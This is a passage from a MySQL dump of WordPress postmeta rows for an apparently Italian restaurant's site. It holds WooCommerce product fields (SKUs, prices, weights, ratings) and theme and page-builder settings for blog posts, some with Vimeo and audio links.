le','no'),(55107,180,'_product_image_gallery',''),(55108,180,'_download_limit','-1'),(55109,180,'_download_expiry','-1'),(55110,180,'_thumbnail_id','46'),(55111,180,'_stock',''),(55112,180,'_stock_status','instock'),(55113,180,'_wc_average_rating','4.50'),(55114,180,'_wc_rating_count','a:2:{i:4;i:1;i:5;i:1;}'),(55115,180,'_wc_review_count','2'),(55116,180,'_downloadable_files','a:0:{}'),(55117,180,'_product_attributes','a:0:{}'),(55118,180,'_product_version','3.4.3'),(55119,180,'_price','86'),(55120,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55121,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55122,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55123,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55124,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55125,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55126,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55127,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55128,180,'mkdf_show_new_sign_woo_meta','no'),(55129,180,'slide_template','default'),(55130,180,'_wpb_vc_js_status','false'),(55131,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55132,3112,'_sku','PR0023'),(55133,3112,'_regular_price','86'),(55134,3112,'_sale_price',''),(55135,3112,'_sale_price_dates_from',''),(55136,3112,'_sale_price_dates_to',''),(55137,3112,'total_sales','0'),(55138,3112,'_tax_status','taxable'),(55139,3112,'_tax_class',''),(55140,3112,'_manage_stock','no'),(55141,3112,'_backorders','no'),(55142,3112,'_sold_individually','no'),(55143,3112,'_weight','280'),(55144,3112,'_length',''),(55145,3112,'_width',''),(55146,3112,'_height',''),(55147,3112,'_upsell_ids','a:0:{}'),(55148,3112,'_crosssell_ids','a:0:{}'),(55149,3112,'_purchase_note',''),(55150,3112,'_default_attributes','a:0:{}'),(55151,3112,'_virtual','no'),(55152,3112,'_downloadable','no'),(55153,3112,'_product_image_gallery',''),(55154,3112,'_download_limit','-1'),(55155,3112,'_download_expiry','-1'),(55156,3112,'_thumbnail_id','47'),(55157,3112,'_stock',''),(55158,3112,'_stock_status','instock'),(55159,3112,'_wc_average_rating','3.00'),(55160,3112,'_wc_rating_count','a:2:{i:2;i:1;i:4;i:1;}'),(55161,3112,'_wc_review_count','2'),(55162,3112,'_downloadable_files','a:0:{}'),(55163,3112,'_product_attributes','a:0:{}'),(55164,3112,'_product_version','3.4.3'),(55165,3112,'_price','86'),(55166,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55167,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55168,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55169,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55170,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55171,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55172,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55173,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55174,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55175,3112,'mkdf_show_new_sign_woo_meta','no'),(55176,3112,'slide_template','default'),(55177,3112,'_wpb_vc_js_status','false'),(55178,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55179,3113,'_sku','PR0024'),(55180,3113,'_regular_price','86'),(55181,3113,'_sale_price',''),(55182,3113,'_sale_price_dates_from',''),(55183,3113,'_sale_price_dates_to',''),(55184,3113,'total_sales','0'),(55185,3113,'_tax_status','taxable'),(55186,3113,'_tax_class',''),(55187,3113,'_manage_stock','no'),(55188,3113,'_backorders','no'),(55189,3113,'_sold_individually','no'),(55190,3113,'_weight','230'),(55191,3113,'_length',''),(55192,3113,'_width',''),(55193,3113,'_height',''),(55194,3113,'_upsell_ids','a:0:{}'),(55195,3113,'_crosssell_ids','a:0:{}'),(55196,3113,'_purchase_note',''),(55197,3113,'_default_attributes','a:0:{}'),(55198,3113,'_virtual','no'),(55199,3113,'_downloadable','no'),(55200,3113,'_product_image_gallery',''),(55201,3113,'_download_limit','-1'),(55202,3113,'_download_expiry','-1'),(55203,3113,'_thumbnail_id','48'),(55204,3113,'_stock',''),(55205,3113,'_stock_status','instock'),(55206,3113,'_wc_average_rating','5.00'),(55207,3113,'_wc_rating_count','a:1:{i:5;i:1;}'),(55208,3113,'_wc_review_count','1'),(55209,3113,'_downloadable_files','a:0:{}'),(55210,3113,'_product_attributes','a:0:{}'),(55211,3113,'_product_version','3.4.3'),(55212,3113,'_price','86'),(55213,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55214,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55215,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55216,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55217,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55218,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55219,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55220,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55221,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55222,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55223,3113,'mkdf_show_new_sign_woo_meta','no'),(55224,3113,'slide_template','default'),(55225,3113,'_wpb_vc_js_status','false'),(55226,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55227,3114,'_sku','PR0025'),(55228,3114,'_regular_price','86'),(55229,3114,'_sale_price',''),(55230,3114,'_sale_price_dates_from',''),(55231,3114,'_sale_price_dates_to',''),(55232,3114,'total_sales','0'),(55233,3114,'_tax_status','taxable'),(55234,3114,'_tax_class',''),(55235,3114,'_manage_stock','no'),(55236,3114,'_backorders','no'),(55237,3114,'_sold_individually','no'),(55238,3114,'_weight','310'),(55239,3114,'_length',''),(55240,3114,'_width',''),(55241,3114,'_height',''),(55242,3114,'_upsell_ids','a:0:{}'),(55243,3114,'_crosssell_ids','a:0:{}'),(55244,3114,'_purchase_note',''),(55245,3114,'_default_attributes','a:0:{}'),(55246,3114,'_virtual','no'),(55247,3114,'_downloadable','no'),(55248,3114,'_product_image_gallery',''),(55249,3114,'_download_limit','-1'),(55250,3114,'_download_expiry','-1'),(55251,3114,'_thumbnail_id','49'),(55252,3114,'_stock',''),(55253,3114,'_stock_status','instock'),(55254,3114,'_wc_average_rating','1.00'),(55255,3114,'_wc_rating_count','a:1:{i:1;i:1;}'),(55256,3114,'_wc_review_count','1'),(55257,3114,'_downloadable_files','a:0:{}'),(55258,3114,'_product_attributes','a:0:{}'),(55259,3114,'_product_version','3.4.3'),(55260,3114,'_price','86'),(55261,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55262,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55263,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55264,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55265,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55266,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55267,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55268,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55269,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55270,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55271,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55272,3114,'mkdf_show_new_sign_woo_meta','no'),(55273,3114,'slide_template','default'),(55274,3114,'_wpb_vc_js_status','false'),(55275,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55276,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55277,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55278,1670,'slide_template','default'),(55279,1670,'mkdf_page_content_behind_header_meta','no'),(55280,1670,'mkdf_video_type_meta','social_networks'),(55281,1670,'mkdf_audio_type_meta','social_networks'),(55282,1670,'mkdf_disable_vertical_header_background_image_meta','no'),(55283,1670,'mkdf_disable_header_widget_areas_meta','no'),(55284,1670,'mkdf_show_title_area_meta','yes'),(55285,1670,'mkdf_title_area_type_meta','attika'),(55286,1670,'_mkdf-like','0'),(55287,1670,'_thumbnail_id','1698'),(55288,1670,'_wpb_vc_js_status','true'),(55289,1670,'mkdf_page_content_padding','120px 0 0'),(55290,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55291,1670,'_dp_original','6'),(55292,1670,'mkdf_post_video_link_meta','https://vimeo.com/172791927'),(55293,1670,'_wp_old_slug','big-chefs-recomendations'),(55294,1670,'_wp_old_slug','big-chefs-recomended'),(55295,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55296,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55297,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55298,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55299,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55300,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55301,1671,'slide_template','default'),(55302,1671,'mkdf_page_content_behind_header_meta','no'),(55303,1671,'mkdf_video_type_meta','social_networks'),(55304,1671,'mkdf_audio_type_meta','social_networks'),(55305,1671,'mkdf_disable_vertical_header_background_image_meta','no'),(55306,1671,'mkdf_disable_header_widget_areas_meta','no'),(55307,1671,'mkdf_show_title_area_meta','yes'),(55308,1671,'mkdf_title_area_type_meta','attika'),(55309,1671,'_mkdf-like','0'),(55310,1671,'_thumbnail_id','1698'),(55311,1671,'_wpb_vc_js_status','true'),(55312,1671,'mkdf_page_content_padding','120px 0 0'),(55313,1671,'_dp_original','1670'),(55314,1671,'mkdf_post_quote_text_meta','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque.'),(55315,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55316,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55317,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55318,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55319,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55320,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55321,1677,'slide_template','default'),(55322,1677,'mkdf_page_content_behind_header_meta','no'),(55323,1677,'mkdf_video_type_meta','social_networks'),(55324,1677,'mkdf_audio_type_meta','social_networks'),(55325,1677,'mkdf_disable_vertical_header_background_image_meta','no'),(55326,1677,'mkdf_disable_header_widget_areas_meta','no'),(55327,1677,'mkdf_show_title_area_meta','yes'),(55328,1677,'mkdf_title_area_type_meta','attika'),(55329,1677,'_mkdf-like','0'),(55330,1677,'_thumbnail_id','1698'),(55331,1677,'_wpb_vc_js_status','true'),(55332,1677,'mkdf_page_content_padding','120px 0 0'),(55333,1677,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(55334,1677,'_dp_original','1670'),(55335,1677,'mkdf_post_link_link_meta','https://themeforest.net/user/mikado-themes'),(55336,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55337,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55338,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55339,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55340,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55341,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55342,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55343,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55344,1681,'slide_template','default'),(55345,1681,'mkdf_page_content_behind_header_meta','no'),(55346,1681,'mkdf_video_type_meta','social_networks'),(55347,1681,'mkdf_audio_type_meta','self'),(55348,1681,'mkdf_disable_vertical_header_background_image_meta','no'),(55349,1681,'mkdf_disable_header_widget_areas_meta','no'),(55350,1681,'mkdf_show_title_area_meta','yes'),(55351,1681,'mkdf_title_area_type_meta','attika'),(55352,1681,'_mkdf-like','0'),(55353,1681,'_thumbnail_id','1699'),(55354,1681,'_wpb_vc_js_status','true'),(55355,1681,'mkdf_page_content_padding','120px 0 0'),(55356,1681,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(55357,1681,'_dp_original','1677'),(55358,1681,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(55359,1681,'_wp_old_slug','fine-dinning-restaurant'),(55360,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55361,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55362,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55363,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55364,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55365,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55366,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55367,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55368,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55369,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55370,1685,'slide_template','default'),(55371,1685,'mkdf_page_content_behind_header_meta','no'),(55372,1685,'mkdf_video_type_meta','social_networks'),(55373,1685,'mkdf_audio_type_meta','self'),(55374,1685,'mkdf_disable_vertical_header_background_image_meta','no'),(55375,1685,'mkdf_disable_header_widget_areas_meta','no'),(55376,1685,'mkdf_show_title_area_meta','yes'),(55377,1685,'mkdf_title_area_type_meta','attika'),(55378,1685,'_mkdf-like','0'),(55379,1685,'_thumbnail_id','1702'),(55380,1685,'_wpb_vc_js_status','true'),(55381,1685,'mkdf_page_content_padding','120px 0 0'),(55382,1685,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(55383,1685,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(55384,1685,'_dp_original','1681'),(55385,1685,'mkdf_post_gallery_images_meta','1702,1703'),(55386,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55387,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55388,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55389,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55390,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55391,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55392,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55393,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55394,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55395,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55396,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55397,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55398,1688,'slide_template','default'),(55399,1688,'mkdf_page_content_behind_header_meta','no'),(55400,1688,'mkdf_video_type_meta','social_networks'),(55401,1688,'mkdf_audio_type_meta','self'),(55402,1688,'mkdf_disable_vertical_header_background_image_meta','no'),(55403,1688,'mkdf_disable_header_widget_areas_meta','no'),(55404,1688,'mkdf_show_title_area_meta','yes'),(55405,1688,'mkdf_title_area_type_meta','attika'),(55406,1688,'_mkdf-like','0'),(55407,1688,'_thumbnail_id','1701'),(55408,1688,'_wpb_vc_js_status','true'),(55409,1688,'mkdf_page_content_padding','120px 0 0'),(55410,1688,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(55411,1688,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(55412,1688,'_dp_original','1685'),(55413,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55414,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55415,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55416,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55417,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55418,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55419,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55420,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55421,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55422,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55423,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55424,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55425,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55426,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(55427,1693,'slide_template','default'),(55428,1693,'mkdf_page_content_behind_header_meta','no'),(55429,1693,'mkdf_video_type_meta','social_networks'),(55430,1693,'mkdf_audio_type_meta','self'),(55431,1693,'mkdf_disable_vertical_header_background_image_meta','no'),(55432,1693,'mkdf_disable_header_widget_areas_meta','no'),(55433,1693,'mkdf_show_title_area_meta','yes'),(55434,1693,'mkdf_title_area_type_meta','attika'),(55435,1693,'_mkdf-like','0'),(55436,1693,'_thumbnail_id','1700'),(55437,1693,'_wpb_vc_js_status','true'),(55438,1693,'mkdf_page_content_padding','120px 0 0'),(55439,1693,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(55440,1693,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(55441,1693,'_dp_original','1688'),(55442,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55443,3115,'_sku','PR0026'),(55444,3115,'_regular_price','86'),(55445,3115,'_sale_price',''),(55446,3115,'_sale_price_dates_from',''),(55447,3115,'_sale_price_dates_to',''),(55448,3115,'total_sales','0'),(55449,3115,'_tax_status','taxable'),(55450,3115,'_tax_class',''),(55451,3115,'_manage_stock','no'),(55452,3115,'_backorders','no'),(55453,3115,'_sold_individually','no'),(55454,3115,'_weight','310'),(55455,3115,'_length',''),(55456,3115,'_width',''),(55457,3115,'_height',''),(55458,3115,'_upsell_ids','a:0:{}'),(55459,3115,'_crosssell_ids','a:0:{}'),(55460,3115,'_purchase_note',''),(55461,3115,'_default_attributes','a:0:{}'),(55462,3115,'_virtual','no'),(55463,3115,'_downloadable','no'),(55464,3115,'_product_image_gallery',''),(55465,3115,'_download_limit','-1'),(55466,3115,'_download_expiry','-1'),(55467,3115,'_stock',''),(55468,3115,'_stock_status','instock'),(55469,3115,'_wc_average_rating','3.00'),(55470,3115,'_wc_rating_count','a:1:{i:3;i:1;}'),(55471,3115,'_wc_review_count','1'),(55472,3115,'_downloadable_files','a:0:{}'),(55473,3115,'_product_attributes','a:0:{}'),(55474,3115,'_product_version','3.4.3'),(55475,3115,'_price','86'),(55476,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55477,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55478,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55479,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55480,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55481,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55482,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55483,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55484,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55485,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55486,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55487,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55488,3115,'mkdf_show_new_sign_woo_meta','no'),(55489,3115,'slide_template','default'),(55490,3115,'_wpb_vc_js_status','false'),(55491,3115,'_thumbnail_id','467'),(55492,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55493,3116,'_sku','PR0027'),(55494,3116,'_regular_price','25'),(55495,3116,'_sale_price',''),(55496,3116,'_sale_price_dates_from',''),(55497,3116,'_sale_price_dates_to',''),(55498,3116,'total_sales','0'),(55499,3116,'_tax_status','taxable'),(55500,3116,'_tax_class',''),(55501,3116,'_manage_stock','no'),(55502,3116,'_backorders','no'),(55503,3116,'_sold_individually','no'),(55504,3116,'_weight','250'),(55505,3116,'_length',''),(55506,3116,'_width',''),(55507,3116,'_height',''),(55508,3116,'_upsell_ids','a:0:{}'),(55509,3116,'_crosssell_ids','a:0:{}'),(55510,3116,'_purchase_note',''),(55511,3116,'_default_attributes','a:0:{}'),(55512,3116,'_virtual','no'),(55513,3116,'_downloadable','no'),(55514,3116,'_product_image_gallery',''),(55515,3116,'_download_limit','-1'),(55516,3116,'_download_expiry','-1'),(55517,3116,'_stock',''),(55518,3116,'_stock_status','instock'),(55519,3116,'_wc_average_rating','4.00'),(55520,3116,'_wc_rating_count','a:1:{i:4;i:1;}'),(55521,3116,'_wc_review_count','1'),(55522,3116,'_downloadable_files','a:0:{}'),(55523,3116,'_product_attributes','a:0:{}'),(55524,3116,'_product_version','3.4.3'),(55525,3116,'_price','25'),(55526,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55527,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55528,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55529,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55530,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55531,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55532,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55533,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55534,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55535,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55536,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55537,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55538,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55539,3116,'mkdf_show_new_sign_woo_meta','no'),(55540,3116,'slide_template','default'),(55541,3116,'_wpb_vc_js_status','false'),(55542,3116,'_thumbnail_id','44'),(55543,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55544,3117,'_sku','PR0028'),(55545,3117,'_regular_price','89'),(55546,3117,'_sale_price',''),(55547,3117,'_sale_price_dates_from',''),(55548,3117,'_sale_price_dates_to',''),(55549,3117,'total_sales','0'),(55550,3117,'_tax_status','taxable'),(55551,3117,'_tax_class',''),(55552,3117,'_manage_stock','no'),(55553,3117,'_backorders','no'),(55554,3117,'_sold_individually','no'),(55555,3117,'_weight','310'),(55556,3117,'_length',''),(55557,3117,'_width',''),(55558,3117,'_height',''),(55559,3117,'_upsell_ids','a:0:{}'),(55560,3117,'_crosssell_ids','a:0:{}'),(55561,3117,'_purchase_note',''),(55562,3117,'_default_attributes','a:0:{}'),(55563,3117,'_virtual','no'),(55564,3117,'_downloadable','no'),(55565,3117,'_product_image_gallery',''),(55566,3117,'_download_limit','-1'),(55567,3117,'_download_expiry','-1'),(55568,3117,'_thumbnail_id','280'),(55569,3117,'_stock',''),(55570,3117,'_stock_status','instock'),(55571,3117,'_wc_average_rating','5.00'),(55572,3117,'_wc_rating_count','a:1:{i:5;i:1;}'),(55573,3117,'_wc_review_count','1'),(55574,3117,'_downloadable_files','a:0:{}'),(55575,3117,'_product_attributes','a:0:{}'),(55576,3117,'_product_version','3.4.3'),(55577,3117,'_price','89'),(55578,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55579,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55580,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55581,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55582,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55583,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55584,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55585,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55586,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55587,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55588,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55589,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55590,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55591,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55592,3117,'mkdf_show_new_sign_woo_meta','no'),(55593,3117,'slide_template','default'),(55594,3117,'_wpb_vc_js_status','false'),(55595,3117,'_wp_old_slug','cream-broccoli-soup'),(55596,3117,'_wp_old_slug','broccoli-soup'),(55597,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55598,3118,'_sku','PR0030'),(55599,3118,'_regular_price','58'),(55600,3118,'_sale_price',''),(55601,3118,'_sale_price_dates_from',''),(55602,3118,'_sale_price_dates_to',''),(55603,3118,'total_sales','0'),(55604,3118,'_tax_status','taxable'),(55605,3118,'_tax_class',''),(55606,3118,'_manage_stock','no'),(55607,3118,'_backorders','no'),(55608,3118,'_sold_individually','no'),(55609,3118,'_weight','310'),(55610,3118,'_length',''),(55611,3118,'_width',''),(55612,3118,'_height',''),(55613,3118,'_upsell_ids','a:0:{}'),(55614,3118,'_crosssell_ids','a:0:{}'),(55615,3118,'_purchase_note',''),(55616,3118,'_default_attributes','a:0:{}'),(55617,3118,'_virtual','no'),(55618,3118,'_downloadable','no'),(55619,3118,'_product_image_gallery',''),(55620,3118,'_download_limit','-1'),(55621,3118,'_download_expiry','-1'),(55622,3118,'_thumbnail_id','273'),(55623,3118,'_stock',''),(55624,3118,'_stock_status','instock'),(55625,3118,'_wc_average_rating','5.00'),(55626,3118,'_wc_rating_count','a:1:{i:5;i:1;}'),(55627,3118,'_wc_review_count','1'),(55628,3118,'_downloadable_f